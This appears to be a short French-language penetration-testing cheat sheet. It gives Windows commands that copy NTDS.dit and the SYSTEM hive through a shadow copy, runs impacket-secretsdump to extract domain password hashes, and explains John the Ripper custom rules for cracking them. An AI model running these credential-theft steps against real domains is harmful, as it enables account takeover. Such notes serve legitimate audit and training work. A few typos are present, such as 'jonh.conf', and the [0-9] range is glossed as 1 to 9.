vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy

u impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL

Faire des règles personnalisées avec John

john <fichier_mdp_a_cracker> –wordlist=dictionary.txt –rules=ma_regle

Editer le fichier /etc/jonh.conf

[List.Rules:maregle]

cAz »[0-9] »

Syntaxe règles

Az – Prends le mot et ajoute les caractères choisis.

Exemple : c Az »2012″ -> prends un mot de la wordlist et ajoute 2012 (Secret2012)

A0 – Ajoute avant le mot les caractères choisis

Exemple : l A0″@ » -> prends le mot tel quel et ajoute le caractère @ (@secret)

c – Mets la première lettre en majuscule

l – Prends le mot tel quel

[0-9] – Va inclure les nombres de 1 à 9

[0] – Va inclure seulement le nombre 0

[A-z] – Va inclure les minuscules et les majuscules

[A-Z] – Va inclure seulement les lettres en majuscules

[a-z] – Va inclure seulement les lettres en minuscules

[a] – Va inclure seulement la lettre a

[!£$%@] – Va inclure les symboles !£$%@

Exemples de règles

[List.Rules:maregle]

c Az »2024″

l Az »2024″

è c Az »2024″ : convertir la première lettre du mot en majuscules et ajouter 2024 (exemple : Secret2024)

è l Az « 2024 » : ajouter 2024 au mot (exemple : secret2024)

john hashes.txt –wordlist=dictionnaire.txt –rules=maregle